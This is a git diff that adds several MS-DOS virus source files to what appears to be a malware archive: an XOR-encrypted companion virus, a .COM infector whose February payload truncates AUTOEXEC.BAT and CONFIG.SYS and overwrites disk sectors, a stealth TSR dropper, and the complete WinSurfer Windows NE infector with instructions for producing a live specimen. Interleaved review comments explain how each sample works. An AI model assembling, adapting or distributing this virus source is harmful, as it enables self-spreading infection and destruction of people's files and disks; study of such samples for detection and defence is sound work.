+ je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + mov dx,offset up_dir ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +exe_mask db "*.EXE",0 ; Mask for all .EXE files +traverse endp + + db 0B1h,043h,04Ah,043h,07Bh + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! 
+ jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 011h,019h,099h,0B6h,0BDh + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov di,bx ; DI points to the DTA + + lea si,[di + 01Eh] ; SI points to file name + mov dx,si ; DX points to file name, too + mov di,offset spawn_name + 1; DI points to new name + xor ah,ah ; AH holds character count +transfer_loop: lodsb ; Load a character + or al,al ; Is it a NULL? + je transfer_end ; If so then leave the loop + inc ah ; Add one to the character count + stosb ; Save the byte in the buffer + jmp short transfer_loop ; Repeat the loop +transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count + mov byte ptr [di],13 ; Make CR the final character + + mov di,dx ; DI points to file name + xor ch,ch ; + mov cl,ah ; CX holds length of filename + mov al,'.' ; AL holds char. to search for + repne scasb ; Search for a dot in the name + mov word ptr [di],'OC' ; Store "CO" as first two bytes + mov byte ptr [di + 2],'M' ; Store "M" to make "COM" + + mov byte ptr [set_carry],0 ; Assume we'll fail + mov ax,03D00h ; DOS open file function, r/o + int 021h + jnc infection_done ; File already exists, so leave + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h + xchg bx,ax ; BX holds file handle + + call encrypt_code ; Write an encrypted copy + + mov ah,03Eh ; DOS close file function + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +spawn_name db 12,12 dup (?),13 ; Name for next spawn +set_carry db ? 
; Set-carry-on-exit flag +infect_file endp + + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Whats Up Virus" + db "By White Shark" + db "Mess with the White Shark and" + db "you'll be eaten alive!" + +encrypt_code proc near + mov si,offset encrypt_decrypt; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 8],dx ; Low word of timer is new key + + xor byte ptr [si],1 ; + xor byte ptr [si + 7],1 ; Change all SIs to DIs + xor word ptr [si + 10],0101h; (and vice-versa) + + mov di,offset finish ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + mov si,offset write_stuff ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + mov dx,offset start ; DX points to virus + + call finish ; Encrypt/write/decrypt + + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.why-wind.asm b/MSDOS/Virus.MSDOS.Unknown.why-wind.asm new file mode 100644 index 00000000..83c3c558 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.why-wind.asm 
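Review bot: The `[VCL]` marker, the `note` text and `spawn_name` all lie between `start_of_code` and `end_of_code`, i.e. inside the region `encrypt_decrypt` XORs with a per-copy key that `encrypt_code` takes from the BIOS timer (INT 1Ah, DX), so none of those strings exists in plaintext in a dropped file and the header should say so rather than leave a reader assuming `vcl_marker` is a static signature. What does stay constant on disk is the decryptor stub (`call encrypt_decrypt` at `main` plus the `mov si`/`mov cx`/`xor word ptr [si],key` loop) and the companion pattern: `infect_file` creates a `.COM` beside each `.EXE` with attributes 00100111b (read-only, hidden, system) and the real program is run afterwards through INT 2Eh with SI->`spawn_name`. A header note such as `; Companion (spawning) virus: creates hidden+system+read-only NAME.COM next to every NAME.EXE found (up to 99 per run); body XOR-encrypted per copy, only the decryptor at 100h is constant` would capture this. The `stop_tracing` block also deserves a one-line comment that it appears to be a prefetch-queue anti-trace sequence ending in `out 021h,al`, which masks the keyboard IRQ when single-stepped, so a reader does not take the `jmp $-2`/`jmp $-10` pair for corrupted code.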
@@ -0,0 +1,221 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +ww proc far + +start: + jmp loc_2 + db 12 dup (90h) + db 0CDh, 20h +loc_2: + jmp short loc_3 + db 90h, 2Ah, 2Eh, 63h, 6Fh, 6Dh + db 00h, 00h +data_8 db 'C:\Command.Com', 0 + db 'C:\Autoexec.Bat', 0 + db 'C:\Config.Sys', 0 + db '\win' +data_12 dw 6F64h + db 'ws\win.com' + db 00h,0E9h, 0Eh, 00h, 90h,0C8h + db 01h +loc_3: + mov bx,101h + mov ah,[bx] + mov bx,102h + mov al,[bx] + xchg al,ah + add ax,3 + mov si,ax + mov ah,1Ah + lea dx,[si+2C8h] + add dx,6 + int 21h + + mov ah,4Eh + lea dx,[si+103h] + mov cx,6 + int 21h + + cmp ax,12h + je loc_7 + lea dx,[si+10Ah] + jmp short loc_6 + db 90h +loc_5: + mov ah,4Dh + int 21h + + mov ah,4Fh + int 21h + + cmp ax,12h + je loc_7 + lea dx,[si+2C8h] + add dx,24h +loc_6: + mov ah,3Dh + mov al,2 + int 21h + + mov bx,ax + mov ah,42h + mov al,2 + mov dx,0 + mov cx,0 + int 21h + + + push ax + sub ax,6 + mov dx,ax + mov ah,42h + mov al,0 + mov cx,0 + int 21h + + + mov ah,3Fh + mov cx,1 + lea dx,[si+14Bh] + int 21h + + + mov ah,byte ptr data_8+30h[si] + cmp ah,42h + jne loc_8 + jmp short loc_5 +loc_7: + jmp short loc_9 + db 90h +loc_8: + mov ah,42h + mov al,0 + mov dx,0 + mov cx,0 + int 21h + + + mov ax,3F00h + mov cx,3 + lea dx,[si+2C8h] + add dx,3 + int 21h + + + mov ax,4200h + mov dx,0 + mov cx,0 + int 21h + + + pop ax + sub ax,3 + mov byte ptr data_8+2Eh[si],al + mov byte ptr data_8+2Fh[si],ah + mov ah,40h + mov cx,3 + lea dx,[si+148h] + int 21h + + + mov ax,4202h + mov dx,0 + mov cx,0 + int 21h + + + mov ah,40h + lea dx,[si+100h] + mov cx,data_12[si] + int 21h + + + mov ax,4000h + lea dx,[si+2C8h] + add dx,3 + mov cx,3 + int 21h + + + jmp short loc_9 + db 90h +loc_9: + mov ah,3Eh + int 21h + + mov ah,41h + lea dx,[si+137h] + int 21h + + mov ah,2Ah + int 21h + + + cmp dh,2 + jne loc_14 + cmp dl,17h + je loc_10 + cmp dl,18h + je loc_11 + cmp dl,19h + je loc_12 + jmp short loc_14 + db 90h +loc_10: + mov ah,3Ch + lea dx,[si+119h] + mov cx,1 + int 
21h + + jmp short loc_14 + db 90h +loc_11: + mov ah,3Ch + lea dx,[si+129h] + mov cx,1 + int 21h + + jmp short loc_14 + db 90h +loc_12: + mov al,2 +loc_13: + mov cx,96h + mov dx,0 + int 26h + + + + inc al + cmp al,4 + jne loc_13 +loc_14: + mov cx,3 + lea ax,[si+2C8h] + mov si,ax + mov di,100h + rep movsb + call sub_1 + int 20h + +ww endp + +sub_1 proc near + mov di,offset start + jmp di + db 'Why Windows ' +copyright db '(c)1992 MaZ / BetaBoys B.B' + db 90h, 90h, 90h +sub_1 endp + + +seg_a ends + + + + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.windooze.asm b/MSDOS/Virus.MSDOS.Unknown.windooze.asm new file mode 100644 index 00000000..eff08e1a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.windooze.asm 
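Review bot: why-wind.asm carries no header, and its date-triggered destructive payload is visible only by decoding the INT 21h/2Ah branch near the end of `ww`: with DH (month) = 2, day 23 (`17h`) recreates `C:\Autoexec.Bat` and day 24 (`18h`) recreates `C:\Config.Sys` with AH=3Ch, truncating them to zero length, and day 25 (`19h`) loops INT 26h in `loc_13` writing 96h sectors from logical sector 0 on drives 2 and 3 (C: and D:), which covers the boot sector, FATs and root directory; BX is never set up as a buffer for that call, so the sectors receive whatever BX happens to address. Regardless of date, every run deletes `\windows\win.com` (AH=41h with DX=`[si+137h]`), which is what the `Why Windows` string refers to, and the first file opened for infection is always `C:\Command.Com` (`[si+10Ah]`) before the `*.com` matches in the current directory. The infection marker is the single byte read six bytes before end-of-file and compared with 42h (`cmp ah,42h`), apparently the `B` of the trailing `BetaBoys B.B` text, so the `sub_1`..`copyright` block doubles as the appended signature. A top-of-file comment such as `; Appends 1C8h bytes to *.COM (entry patched to E9 jmp, 3 original bytes stored after the body); marker: byte at EOF-6 == 'B'; deletes \windows\win.com each run; 23-25 Feb payload truncates AUTOEXEC.BAT/CONFIG.SYS and overwrites C:/D: sectors 0-149` would let a reader classify the sample without re-deriving the `si` delta-offset arithmetic.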
@@ -0,0 +1,289 @@ +ideal +@date = 0355h ;21.10.1981 +@time = 8E79h ;17:51:50 +model tiny +codeseg +startupcode + jmp begin +; +macro intdos + pushf + call [dword cs:oi21] +endm +; +i21: push ax + xor al,al + cmp ah,3ch + jz okk + cmp ah,5bh + jz okk + cmp ah,3dh + jz okk + inc al + cmp ah,16h + jz okk + cmp ah,0fh + jnz ov0 +okk: jmp ok +ov0: cmp ah,1ah + jz setdta + mov [byte cs:funct],12h + cmp ah,12h + jz fndf + cmp ah,11h + jz fndf + mov [byte cs:funct],4fh + cmp ah,4eh + jz fndh + cmp ah,4fh + jz fndh +ov: pop ax + db 0eah +oi21 dw 0 +oi21s dw 0 +; +setdta: mov [cs:dta],dx + mov [cs:dta+2],ds + jmp ov +; +fndh: pop ax +fnd0: intdos + jc fex + pushf + push si di es ds + lds si,[dword cs:dta] +compar: cmp [word si+16h],@time + jnz f10 + cmp [word si+18h],@date + jnz f10 + pop ds es di si + popf + lds dx,[dword cs:dta] + db 0b4h +funct db 4fh + jmp fnd0 +f10: pop ds es di si + popf +fex: push ax bp + mov bp,sp + lahf + mov [ss:bp+8],ah + pop bp ax + iret +; +fndf: pop ax +fnf0: intdos + and al,al + jnz fex + pushf + push si di es ds + lds si,[dword cs:dta] + cmp [byte ds:si],0ffh + jnz f21 + add si,7 +f21: inc si + jmp compar +; +ok: push bx cx dx si di ds es + and al,al + jz nex + mov cx,6 + mov ax,cs + mov es,ax + lea di,[ok1] + mov si,dx + rep cmpsw + jnz nex + pop es ds di si dx cx bx ax + mov ax,1313h + iret +nex: + xor ax,ax + mov ds,ax + mov ax,[ds:90h] + push ax + mov ax,[ds:92h] + push ax + mov [word ds:90h],offset i24 + mov [word ds:92h],cs + + mov bx,[ds:46ch] + mov ax,cs + mov ds,ax + mov es,ax + test bx,6C1h + jnz no_chg + cmp [byte pauss],0 + jz chg1 + dec [byte pauss] + jmp no_chg +chg1: mov [pauss],80 + xor al,al + out 43h,al + jcxz $+2 + in al,40h + mov bl,al + in al,40h + add al,bl + and al,1fh + cmp al,'Z'-'A' + jbe xx1 + sub al,'Z'-'A' +xx1: add al,'A' + std + mov si,offset fname+6 + lea di,[si+1] + mov cx,7 + rep movsb + stosb +no_chg: + mov ah,5bh + lea dx,[fname] + mov cx,1 + intdos + jc term + mov bx,ax + mov ah,40h + mov cx,offset 
endcod-100h + mov dx,100h +; inc [cs:count] + mov [cs:flag],0 + intdos + cmp ax,offset endcod-100h + jnz ok1 + mov [cs:flag],1 +ok1: mov ax,5701h + mov cx,@time + mov dx,@date + intdos + + mov ah,3eh + intdos + cmp [cs:flag],1 + jz term + + lea dx,[fname] + mov ax,4301h + xor cx,cx + intdos + lea dx,[fname] + mov ah,41h +; dec [cs:count] + intdos +term: xor ax,ax + mov ds,ax + pop ax + mov [ds:92h],ax + pop ax + mov [ds:90h],ax +ok0: pop es ds di si dx cx bx + jmp ov +driv db 0 +flag db 0 +; +i24: mov al,3 + iret +; +begin: mov ah,16h + lea dx,[ok1] + int 21h + cmp ax,1313h + jnz b01 +b02: int 20h +b01: mov ax,[ds:2ch] + mov ds,ax + xor si,si + cld +b04: lodsb + and al,al + jnz b04 + lodsb + and al,al + jnz b04 + inc si + inc si +b05: mov bx,si +b06: lodsb + cmp al,':' + jz b05 + cmp al,'\' + jz b05 + and al,al + jnz b06 + mov cx,si + sub cx,bx + mov si,bx + mov di,offset fname + rep movsb + mov ah,2fh + int 21h + mov [cs:dta],bx + mov [cs:dta+2],es + mov [byte cs:pauss],0 + mov ax,cs + mov ds,ax + dec ax + mov es,ax + + mov cl,4 + mov ax,offset endpr-100h + add ax,15 + shr ax,cl + mov cx,[es:3] + sub [es:3],ax + mov bx,ax + mov ax,cs + add ax,[es:3] + sub ax,10h + mov [bseg],ax + cmp [byte es:0],'Z' + jz b10 + + push ds + mov ax,cs + add ax,cx + mov ds,ax + sub ax,bx + mov es,ax + sub ax,0fh + mov [cs:bseg],ax + xor si,si + mov di,si + mov cx,8 + rep movsw + add [es:3],bx + sub [es:1],bx + pop ds + +b10: mov ax,[bseg] + mov es,ax + mov si,100h + mov di,si + mov cx,offset endpr-100h + rep movsb + mov di,offset b03 + xchg di,[0ah] + xchg ax,[0ch] + mov [es:oter],di + mov [es:oter+2],ax + ret +b03: push ax bx ds es cs + pop ds + mov ax,3521h + int 21h + mov [oi21],bx + mov [oi21s],es + mov ax,2521h + lea dx,[i21] + int 21h + pop es ds bx ax + db 0eah +endcod = $ +oter dw 0 +bseg dw ? +count dw ? +pauss db ? +fname db 13 dup (?) +dta dw ?,? +endpr = $ +end \ No newline at end of file 
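Review bot: The `@date`/`@time` equates are commented only as a calendar value, but the code uses them as the sample's identity in two places: `ok1` stamps every dropped file with them through `5701h`, and `compar` compares the DTA time/date fields (`[si+16h]`/`[si+18h]`) against them to skip matching entries in the hooked `11h`/`12h`/`4Eh`/`4Fh` calls. A comment above the equates such as `; infection stamp: written by 5701h in ok1, matched in compar to hide dropped files` would make that dual role and the resulting indicator (files dated 21.10.1981 17:51:50) obvious to a reader. `driv` and `count` are declared but `count` is touched only in the two commented-out lines and `driv` nowhere visible, so they are dead storage worth a note. The residency handshake (`ah=16h` with `dx=offset ok1`, answered by `ax=1313h` in `ok`/`begin`) is likewise undocumented.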
diff --git a/MSDOS/Virus.MSDOS.Unknown.winsurfr.a86 b/MSDOS/Virus.MSDOS.Unknown.winsurfr.a86 new file mode 100644 index 00000000..49dad015 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.winsurfr.a86 
@@ -0,0 +1,654 @@ + +;------------------------------------------------------------------------- +; +; WinSurfer Virus (c) 1995 VLAD incorporated. +; Written by qark and quantum. +; +; This virus is a parasitic TSR infector of NewEXE files. It works in +; protected mode only and infects on file execute. +; +; The executable infection code is by qark, while the interrupt handler +; code is by quantum. +; +; This virus contains no stealth of any form, a simple readonly attribute +; will stop the virus from writing, the time/date stamp is not preserved +; and there is no encryption of any form. Windows users are too dumb to +; notice anyway. +; +; To obtain a specimen of the virus, copy the compiled com file into the +; same directory as the file WINMINE.EXE and run it. Go into Windows +; and run the game 'Minesweeper'. Minesweeper should infect program +; manager direct action, so that next time windows is booted the virus +; will be resident. +; +; Possible Bugs and Improvements: +; 1) An error may be that if the file isn't exactly shift alignment sized +; the virus will overwrite some data at the end of the file or be +; incorrectly pointed. +; 2) An error may occur if the end of the segment table is less than eight +; bytes from a 512 byte divisor. +; 3) It may be possible to allocate buffer space without adding to virus +; size by changing the segment memory size in the segment table. At the +; moment the virus size is being doubled by the 512 byte read buffer we +; include in the disk image. +; +; Although the final virus was coded completely by quantum and I, many +; people helped by offering ideas, and windows documentation so I +; must give thanks to the following people: +; Screaming Radish, Stalker X, Dreadlord and some scandinavian dude. +; The most important help came from Malware who taught me the relocation +; entry ffff trick. +; +; Assemble with a86. 
+;------------------------------------------------------------------------- + + +;--Directly below is dropper code, ignore it, page down to the virus code-- + + mov ax,3d02h + mov dx,offset fname + int 21h + xchg bx,ax + + mov ah,3fh + mov cx,512 + mov dx,offset buffer + int 21h + + mov si,offset buffer + cmp word ptr [si+3ch],400h + je ok_dropper + int 20h +ok_dropper: + mov ax,word ptr [si+2] + mov word ptr ppage,ax + mov ax,word ptr [si+4] + mov word ptr pfile,ax + + mov ax,4200h + xor cx,cx + cwd + int 21h + + mov ah,40h + mov cx,offset setsp - offset header + mov dx,offset header + int 21h + + mov ax,4200h + xor cx,cx + mov dx,word ptr [si+3ch] + int 21h + + mov ah,3fh + mov cx,512 + mov dx,offset buffer + int 21h + + mov ax,word ptr [si+1ch] + inc word ptr [si+1ch] ;increase segment count + mov cl,8 + mul cl + + mov di,word ptr [si+22h] + add di,si + add di,ax + + mov ax,4202h + xor cx,cx + cwd + int 21h + + ;write in the new segment into the table + + mov cl,byte ptr [si+32h] + push bx + mov bx,1 + shl bx,cl + mov cx,bx + pop bx + div cx + + mov word ptr [di],ax + mov word ptr [di+2],winend-win_entry + mov word ptr [di+4],180h + mov word ptr [di+6],winend-win_entry + + mov ax,word ptr [si+14h] + mov word ptr winip2,ax + + mov word ptr [si+14h],0 + + mov ax,word ptr [si+16h] + mov word ptr wincs2,ax + mov ax,word ptr [si+1ch] ;new cs:ip + mov word ptr [si+16h],ax + + mov ah,40h + mov cx,winend-win_entry + 20h + mov dx,offset win_entry + int 21h + + add word ptr [si+4],512 + + add word ptr [si+24h],512 + add word ptr [si+26h],512 + add word ptr [si+28h],512 + add word ptr [si+2ah],512 + + mov dx,512 + mov ax,4200h + xor cx,cx + int 21h + + mov ah,40h + mov cx,512 + mov dx,offset buffer + int 21h + + mov ah,3eh + int 21h + + int 20h + +;--The New Windows DOS stub-- +header db 'MZ' +ppage dw 0 ;part page +pfile dw 0 ;file/512 + dw 0 ;relocation items + dw 10h ;header size/16 + dw 0 ;minmem + dw -1 ;maxmem + dw 0 ;SS + dw offset setsp - offset winstart ;SP + dw 0 
;checksum + dw 0 ;IP + dw 0 ;CS + dw 40h ;Relocation offset + dupsize1 equ 3ch - ($-offset header) + db dupsize1 dup (0) + dw 200h ;NE offset + dupsize2 equ 100h - ($-offset header) + db dupsize2 dup (0) +winstart: + call windowsmsg + db 'This program requires Microsoft Windows.',0dh,0ah,'$' +windowsmsg: + pop dx + push cs + pop ds + mov ah,9 + int 21h + mov ax,4c01h + int 21h + db 100 dup (0) +setsp: +;---end of fake dropper dos stub-- + +fname db 'winmine.exe',0 + + +;----Start of the Virus---All the above is the dropper code, ignore it------- + +win_entry: ;Infected windows executables start here. + jmp realenter + +int21start: ;Virus Int21 handler + + cmp ax,1894h ;Residency test ? + jnz nottest + mov cx,1234h + iret +nottest: + + pusha + push ds + push es + + cmp ah,4bh ;Windows is so dumb it uses DOS to + ;execute. + jnz return2int + call executing + +return2int: + + pop es + pop ds + popa + + db 0eah +oldint21 dw 0,0 + +executing: + + mov ax,3d02h ;Open file in DS:DX + int 21h + jnc ok_open + ret +ok_open: + push ax + mov ax,0ah ;This function makes our CS writable. + push cs + pop bx + int 31h + push ax + pop ds + pop bx + + mov ah,3fh ;Read first 512 bytes of EXE header. + mov cx,512 + mov dx,offset buffer-offset win_entry + int 21h + + mov si,offset buffer-offset win_entry + + cmp word ptr [si],'ZM' ;Not a COM file. + jne bad_open + cmp word ptr [si+18h],40h ;40h+ for NE exe's + jb bad_open + cmp word ptr [si+3ch],400h ;header will be below if + je fileisoktoinfect ;already infected... +bad_open: + jmp fileisunsuitable + +fileisoktoinfect: + sub word ptr [si+3ch],8 ;Change NE pointer. + sub word ptr [si+10h],8 ;Incase stack is end of header + + mov ax,4200h ;Lseek right back to the start. + xor cx,cx + cwd + int 21h + + mov ah,40h ;Rewrite the modified DOS header. + mov cx,512 + mov dx,offset buffer - offset win_entry + int 21h + jc bad_open ;Write fail.. outta here! + + mov ax,4200h ;Lseek to NE header. 
+ xor cx,cx + mov dx,400h + int 21h + + mov ah,3fh ;Read in first 512 bytes. + mov cx,512 + mov dx,offset buffer - offset win_entry + int 21h + + ;Adjust header offsets. Any tables behind the segment table will + ;have their offset increased by eight because we are inserting a new + ;eight byte segment entry. + + mov ax,word ptr [si+22h] ;AX=Segment table offset. + cmp word ptr [si+4],ax + jb ok_et + add word ptr [si+4],8 +ok_et: + cmp word ptr [si+24h],ax + jb ok_rt + add word ptr [si+24h],8 +ok_rt: + cmp word ptr [si+26h],ax + jb ok_rnt + add word ptr [si+26h],8 +ok_rnt: + cmp word ptr [si+28h],ax + jb ok_mrt + add word ptr [si+28h],8 +ok_mrt: + cmp word ptr [si+2ah],ax + jb ok_int + add word ptr [si+2ah],8 +ok_int: + + mov ax,word ptr [si+1ch] + inc word ptr [si+1ch] ;Increase segment count. + mov cl,8 ;Assume less than 256 segments. + mul cl + + add ax,word ptr [si+22h] ;AX=Size of segment table. + xor dx,dx ;High order division value. + mov cx,512 ;512 byte portions are used + ; for the reads later on. + div cx + + mov word ptr [offset ne_size-offset win_entry],ax + ;How much we'll have to read. + mov word ptr [offset last_ne-offset win_entry],dx + ;Where the end of the segment table + ; will be when we read it into the + ; buffer. (The last buffer) + + ;Put the original CS:IP into our relocation table. + push word ptr [si+14h] + pop word ptr [offset newwinip2 - offset win_entry] + push word ptr [si+16h] + pop word ptr [offset newwincs2 - offset win_entry] + + ;Save the alignment shift count because we need that for calculating + ;the offset of our segment when writing the segment entry. + push word ptr [si+32h] + pop word ptr [offset al_shift - offset win_entry] + + ;Point CS:IP to the virus. 
+ mov word ptr [si+14h],0 ;The new IP + mov ax,word ptr [si+1ch] + mov word ptr [si+16h],ax ;The new CS + + ;Initialise the lseek variable + mov word ptr [offset lseek-offset win_entry],400h + + ;The below code gets the NE header and keeps moving it forward by + ;eight bytes in 512 byte chunks. +move_header_forward: + mov ax,word ptr [offset ne_size-offset win_entry] + or ax,ax + jz last_page + + dec word ptr [offset ne_size-offset win_entry] + + mov ax,4200h ;Lseek to our current position. + xor cx,cx + mov dx,word ptr [offset lseek-offset win_entry] + sub dx,8 + int 21h + + mov ah,40h ;Write the header section out. + mov cx,512 + mov dx,si + int 21h + + ;Advance the pointer by 512. + add word ptr [offset lseek-offset win_entry],512 + + mov ax,4200h ;Lseek to the next chunk. + xor cx,cx + mov dx,word ptr [offset lseek-offset win_entry] + int 21h + + mov ah,3fh ;Read it. + mov dx,offset buffer - offset win_entry + mov cx,512 + int 21h + + jmp move_header_forward + +last_page: + mov ax,4202h ;Lseek to end of file. + xor cx,cx + cwd + int 21h ;File length into DX:AX + + ;DX:AX=File offset of our segment + ;Below section shifts the segment offset right by the alignment + ;shift value. + mov cl,byte ptr [offset al_shift - offset win_entry] + push bx + mov bx,1 + shl bx,cl + mov cx,bx + pop bx + div cx + + mov di,si + add di,word ptr [offset last_ne-offset win_entry] + + ;Adding the new segment table entry + mov word ptr [di],ax ;Segment offset + mov word ptr [di+2],offset winend-offset win_entry + mov word ptr [di+4],180h ;Segment attribute + ; 180h = NonMovable + Relocations + mov word ptr [di+6],offset winend-offset win_entry + + mov ax,4200h ;Lseek to next position. + xor cx,cx + mov dx,word ptr [offset lseek-offset win_entry] + sub dx,8 + int 21h + + mov ah,40h ;Write rest of NE header + new seg entry. + mov cx,word ptr [offset last_ne-offset win_entry] + add cx,8 ;Added segment entry means eight more. 
+ mov dx,offset buffer - offset win_entry + int 21h + + ;Reset the relocatable pointer. + push word ptr [offset winip - offset win_entry] + push word ptr [offset wincs - offset win_entry] + mov word ptr [offset winip - offset win_entry],0 + mov word ptr [offset wincs - offset win_entry],0ffffh + + mov ax,4202h ;Lseek to end of file. + xor cx,cx + cwd + int 21h + + mov ah,40h ;Write main virus body. + mov cx,offset winend-offset win_entry + xor dx,dx + int 21h + + pop word ptr [offset wincs - offset win_entry] + pop word ptr [offset winip - offset win_entry] + + mov ah,40h ;Write the relocation item. + mov cx,offset winend-offset relocblk + mov dx,offset relocblk-offset win_entry + int 21h + +fileisunsuitable: + + mov ah,3eh ;Close file. + int 21h + + ret + + prefix db 'hell=' + windir db 'indir=' + systemfile db 'system.ini',0 + NE_Size dw 0 + Last_NE dw 0 + Al_Shift dw 0 + LSeek dw 0 + progman db 0 ;1=Program Manager + envir dw 0 ;environment segment + pathbuff db 142 dup (0) +realenter: + + pusha + push si + push di + push ds + push es + + mov ax,1686h ;Is DPMI available ? + int 2fh + or ax,ax + jz dpmifound +no_dpmi: + jmp alreadyinmem +dpmifound: + mov ax,000ah ;Make CS writable. + push cs ;Protected mode isn't protected. + pop bx + int 31h ;Use DPMI. + push ax + pop ds + + xor cx,cx ;Check if resident. + mov ax,1894h + int 21h + + cmp cx,1234h ;Must be resident.. + jz no_dpmi + + cmp byte ptr [offset progman - offset win_entry],1 + jne direct_progman + + mov byte ptr [offset progman - offset win_entry],0 + + ;Can't go TSR off any program but program manager. + mov ax,0204h ;Get real mode interrupt vector. + mov bl,21h + int 31h + + mov ds:[offset oldint21 - win_entry],dx + mov ds:[offset oldint21 - win_entry + 2],cx + + push cs + pop cx + mov dx,offset int21start-win_entry + mov ax,0205h + mov bl,21h + int 31h ;Set real mode interrupt vector. 
+ jmp alreadyinmem + +direct_progman: + ;Next portion of code searches for the environment variable + ;'windir' and places that before the files we access. + + ;On entry ES=PSP + + mov ax,word ptr es:[2ch] ;PSP:[2ch]=Environment segment. + + cld + + mov es,ax + + mov al,'w' ;w from windir + mov cx,-1 + xor di,di + mov dx,di +dir_loop: + mov di,dx + repnz scasb + mov dx,di + mov si,offset windir-win_entry + push cx + mov cx,6 + repe cmpsb ;indir from windir + pop cx + jne dir_loop + mov si,di + mov ax,ds + push es + pop ds + mov es,ax + mov cx,128 + mov di,offset pathbuff-win_entry + rep movsb ;Move it into our path buffer. + push es + pop ds + + mov di,offset pathbuff-win_entry + mov al,0 + mov cx,128 + repnz scasb + mov byte ptr es:[di-1],'\' ;Add a slash behind the path. + mov si,offset systemfile -offset win_entry + mov cx,11 + rep movsb + + ;The below code reads in the 'system.ini' file and searches for + ;the 'shell=' value, and infects the program specified by it. + ;The windows shell (eg program manager) is always active in memory + ;and we use it to go resident off. + + mov ax,3d02h + mov dx,offset pathbuff -offset win_entry + int 21h + + jc alreadyinmem + xchg bx,ax + + mov ah,3fh + mov cx,512 + mov dx,offset buffer -offset win_entry + int 21h + + mov ah,3eh + int 21h + + push ds + pop es + + mov di,offset buffer-offset win_entry + mov dx,di + + cld + mov cx,512 +shell_loop: + mov di,dx + mov al,'s' ;The 's' in 'shell=' + repne scasb + jne alreadyinmem + mov dx,di + + mov si,offset prefix -offset win_entry ;Test for 'hell=' + push cx + mov cx,5 + repe cmpsb + pop cx + jne shell_loop + mov si,di ;Offset of filename into DX. + + mov al,'.' ;The dot in the filename extension. + mov cl,0ffh + repne scasb + add di,3 ;Point to past the filename. + mov byte ptr es:[di],0 ;Add a zero to make it asciiz. + + mov di,offset pathbuff-win_entry + mov al,0 + mov cx,128 + repnz scasb ;Search for the 0 at the path end. + dec di + mov al,'\' ;Now find the last backslash. 
+ mov cx,128 + std ;Scan backwards. + repnz scasb + cld + inc di ;DI points behind the final '\' + inc di + mov cx,15 + rep movsb ;Append the shell program name. + mov dx,offset pathbuff-win_entry + + mov byte ptr [offset progman - offset win_entry],1 + call executing + mov byte ptr [offset progman - offset win_entry],0 + +alreadyinmem: + + pop es + pop ds + pop di + pop si + popa + + db 0eah ;JMP FAR PTR xxxx:xxxx +winip dw 0 +wincs dw 0ffffh ;Needs to be FFFF due to windows + ; relocation item format. +buffer db 512 dup (0) + +;Below is the relocation item format. What ours does is turn the far jump +; above us into a jump to the original CS:IP. +relocblk dw 1 ;Signal only one relocation item. + db 3 ;32 bit pointer relocation. + db 4 ;Additive relocation (unsure, but + ; it doesnt work unless you put this) + dw offset winip-offset win_entry ;Relocation offset. +newwincs2 dw 0 ;Target of the relocation. (We use +newwinip2 dw 0 ; the original host CS:IP) + +winend: ;The actual virus ends here. +;-----End of the Virus---Below is dropper code----------------------------- + dw 1 + db 3 + db 4 + dw offset winip - offset win_entry +wincs2 dw 0 +winip2 dw 0 + diff --git a/MSDOS/Virus.MSDOS.Unknown.winvir.asm b/MSDOS/Virus.MSDOS.Unknown.winvir.asm new file mode 100644 index 00000000..3cc26f71 --- /dev/null +++ 